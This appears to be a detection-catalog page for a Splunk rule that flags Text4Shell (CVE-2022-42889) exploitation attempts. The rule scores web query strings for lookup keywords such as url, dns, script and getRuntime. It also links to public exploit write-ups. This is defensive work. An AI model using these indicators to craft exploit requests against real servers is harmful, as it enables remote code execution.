Exploit Public Facing Application via Apache Commons Text

Status: production
Severity: low
Group by: Web.src, Web.status, c-uri-query, c-uri-stem, c-useragent, cs-host, cs-method
Author: Michael Haag, Splunk
Source: github.com/splunk/security_content

The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.

MITRE ATT&CK coverage

Tactic	Techniques
Initial Access	`T1133` External Remote Services, `T1190` Exploit Public-Facing Application
Persistence	`T1133` External Remote Services, `T1505.003` Server Software Component: Web Shell

Rule body splunk

name: Exploit Public Facing Application via Apache Commons Text
id: 19a481e0-c97c-4d14-b1db-75a708eb592e
version: 11
creation_date: '2022-10-26'
modification_date: '2026-05-13'
author: Michael Haag, Splunk
status: production
type: Anomaly
description: The following analytic detects attempts to exploit the CVE-2022-42889 vulnerability in the Apache Commons Text Library, known as Text4Shell. It leverages the Web datamodel to identify suspicious HTTP requests containing specific lookup keys (url, dns, script) that can lead to Remote Code Execution (RCE). This activity is significant as it targets a critical vulnerability that can allow attackers to execute arbitrary code on the server. If confirmed malicious, this could lead to full system compromise, data exfiltration, or further lateral movement within the network.
data_source:
    - Nginx Access
search: |-
    | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Web
      WHERE Web.http_method IN (POST, GET)
      BY Web.src Web.status Web.uri_path
         Web.dest Web.http_method Web.uri_query
         Web.http_user_agent
    | `drop_dm_object_name("Web")`
    | eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0)
    | eval lookup = if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0)
    | eval other_lookups = if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0)
    | addtotals fieldname=Score utf lookup other_lookups
    | fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime
    | `security_content_ctime(firstTime)`
    | `security_content_ctime(lastTime)`
    | where Score >= 3
    | `exploit_public_facing_application_via_apache_commons_text_filter`
how_to_implement: To implement, one must be collecting network traffic that is normalized in CIM and able to be queried via the Web datamodel. Or, take the chunks out needed and tie to a specific network source type to hunt in. Tune as needed, or remove the other_lookups statement.
known_false_positives: False positives are present when the values are set to 1 for utf and lookup. It's possible to raise this to TTP (direct finding) if removal of other_lookups occur and Score is raised to 2 (down from 4).
references:
    - https://sysdig.com/blog/cve-2022-42889-text4shell/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
    - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
    - https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
    - https://github.com/kljunowsky/CVE-2022-42889-text4shell
    - https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035
drilldown_searches:
    - name: View the detection results for - "$dest$"
      search: '%original_detection_search% | search  dest = "$dest$"'
      earliest_offset: $info_min_time$
      latest_offset: $info_max_time$
    - name: View risk events for the last 7 days for - "$dest$"
      search: '| from datamodel Risk.All_Risk | search normalized_risk_object IN ("$dest$") | stats count min(_time) as firstTime max(_time) as lastTime values(search_name) as "Search Name" values(risk_message) as "Risk Message" values(analyticstories) as "Analytic Stories" values(annotations._all) as "Annotations" values(annotations.mitre_attack.mitre_tactic) as "ATT&CK Tactics" by normalized_risk_object | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`'
      earliest_offset: 7d
      latest_offset: "0"
intermediate_findings:
    entities:
        - field: dest
          type: system
          score: 20
          message: A URL was requested related to Text4Shell on $dest$ by $src$.
threat_objects:
    - field: src
      type: ip_address
analytic_story:
    - Text4Shell CVE-2022-42889
asset_type: Web Server
cve:
    - CVE-2022-42889
mitre_attack_id:
    - T1133
    - T1190
    - T1505.003
product:
    - Splunk Enterprise
    - Splunk Enterprise Security
    - Splunk Cloud
category: web
security_domain: network
tests:
    - name: True Positive Test
      attack_data:
        - data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1190/text4shell/text4shell_nginx.log
          source: nginx:plus:kv
          sourcetype: nginx:plus:kv
      test_type: unit

Stages and Predicates

Stage 1: `tstats`

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Web
  WHERE Web.http_method IN (POST, GET)
  BY Web.src Web.status Web.uri_path
     Web.dest Web.http_method Web.uri_query
     Web.http_user_agent

Stage 2: `search`

| `drop_dm_object_name("Web")`

Stage 3: `eval`

| eval utf=if(like(lower(uri_query),"%:utf-8:http%"),2,0)

utf =

iflike(lower(uri_query), "%:utf-8:http%")2

else0

Stage 4: `eval`

| eval lookup = if(like(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%"),2,0)

lookup =

iflike(lower(uri_query), "%url%") OR like(lower(uri_query), "%dns%") OR like(lower(uri_query), "%script%")2

else0

Stage 5: `eval`

| eval other_lookups = if(like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%"),1,0)

other_lookups =

like(lower(uri_query), "%env%") OR like(lower(uri_query), "%file%") OR like(lower(uri_query), "%getRuntime%") OR like(lower(uri_query), "%java%") OR like(lower(uri_query), "%localhost%") OR like(lower(uri_query), "%properties%") OR like(lower(uri_query), "%resource%") OR like(lower(uri_query), "%sys%") OR like(lower(uri_query), "%xml%") OR like(lower(uri_query), "%base%")

1

else0

Stage 6: `addtotals`

| addtotals fieldname=Score utf lookup other_lookups

Stage 7: `fields`

| fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime

Stage 8: `search`

| `security_content_ctime(firstTime)`

Stage 9: `search`

| `security_content_ctime(lastTime)`

Stage 10: `where`

| where Score >= 3

Stage 11: `search`

| `exploit_public_facing_application_via_apache_commons_text_filter`

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

Field	Kind	Values
`Score`	ge	`3`
`Web.http_method`	in	`"GET"` `"POST"`

`j` / `k`	Scroll down / up
`d` / `u`	Half-page down / up
`gg` / `G`	Top / bottom
`h` / `l`	History back / forward
`f`	Follow link (`Shift` = new tab)
`/`	Focus search
`?`	Toggle this help
`↑` / `↓`	Navigate search results
`Enter`	Open highlighted result
`Esc`	Close results / dialog

`type:`	`events` / `rules` / `providers`
`vendor:`	`sigma` / `elastic` / `splunk` / `kusto` / `chronicle` (vendor name alone also works: `sigma:`, `kql:`, `secops:`…)
`tactic:`	TA-id, slug, or name: `credential_access`, `TA0006`
`technique:`	technique or sub-technique ID: `T1003`, `T1003.001` (alias `tech:`)
`severity:`	`critical` / `high` / `medium` / `low` / `informational` (alias `sev:`)
`risk_score`	Numeric comparison on the Elastic risk score (0 to 100): `risk_score>50`, `risk_score<=20`, `risk_score=99` (alias `risk`; Elastic rules only)
`stages:`	Rules with exactly N pipeline stages
`correlation:`	`single_event` / `sequence` / `alternatives` / `alternatives_cross_log` / `all_required` / `correlated`
`with:`	Co-occurrence event-id; stacks (`with:4624 with:4769`) to require all, while a comma list in one occurrence (`with:4624,4769`) is an either-or group. Implies multi-event
`like:`	Structural neighbors of a rule slug (equivalents + subsumption stricter / broader): `like:comsvcs_lsass_memory_dump-splunk-sysmon`
`groupby:`	Entity-grouping substring match against `group_by_keys`: `groupby:user`, `groupby:host`
`uses:`	Rules whose predicate tree touches the field (any kind, any value): `uses:CommandLine`
`excludes:`	Rules with top-level `not()` clauses on the field (FP whitelists): `excludes:ParentImage`
`field:` / `value:`	Predicate search; narrows rule cards to those with a matching leaf and drives the indicator tier. Unquoted = substring, wildcards allowed (`value:mimikatz`)
`indicator:`	Shorthand for `field:F value:V`: `indicator:Image=*\powershell.exe`
`kind:`	Filter by predicate kind. Narrows rule cards to those carrying a matching predicate leaf (`vendor:elastic kind:cidr_match`) and drives the indicator tier: `contains` / `starts_with` / `ends_with` / `regex` / `cidr` / `eq` / `in` … (operator aliases `op:`/`match:`)
`has:` / `no:`	`sample`, `field`, `notes`, `refs`, `trace`, `thirdparty`, `rule`, `pattern`, `timewindow`, `threshold`, `newterms`, `sigma`/`elastic`/`splunk`/`kusto`/`chronicle`
`-op:val`	Exclude matches; works on most operators but not `type:`/`like:`/`has:`/`no:` (use `no:<flag>` to exclude a rule flag): `tactic:execution -vendor:splunk`. Standalone `-kind:`/`-field:`/`-value:` drop every rule carrying a matching predicate leaf (`type:rules -kind:is_null`)
`field:"…"` / `value:"…"`	Quoted value = anchored exact match (also allows spaces): `value:"net user"`
`a,b`	Comma = OR inside one operator (`vendor:sigma,elastic`, `severity:high,critical`); repeating a facet merges the same way. `field:`/`value:` never split (literal commas)
`vendors:` / `stage:`	Singular and plural spellings fold to the canonical operator and value: `tactics:` = `tactic:`, `type:event` = `type:events`, `correlation:sequences` = `correlation:sequence`, `has:thresholds` = `has:threshold`
`"quoted phrase"`	Exact-match a multi-word phrase (free text)

Exploit Public Facing Application via Apache Commons Text

MITRE ATT&CK coverage

Rule body splunk

Stages and Predicates

Stage 1: `tstats`

Stage 2: `search`

Stage 3: `eval`

Stage 4: `eval`

Stage 5: `eval`

Stage 6: `addtotals`

Stage 7: `fields`

Stage 8: `search`

Stage 9: `search`

Stage 10: `where`

Stage 11: `search`

Indicators

Keyboard shortcuts

Search operators

Exploit Public Facing Application via Apache Commons Text

MITRE ATT&CK coverage

Rule body splunk

Stages and Predicates

Stage 1: tstats

Stage 2: search

Stage 3: eval

Stage 4: eval

Stage 5: eval

Stage 6: addtotals

Stage 7: fields

Stage 8: search

Stage 9: search

Stage 10: where

Stage 11: search

Indicators

Stage 1: `tstats`

Stage 2: `search`

Stage 3: `eval`

Stage 4: `eval`

Stage 5: `eval`

Stage 6: `addtotals`

Stage 7: `fields`

Stage 8: `search`

Stage 9: `search`

Stage 10: `where`

Stage 11: `search`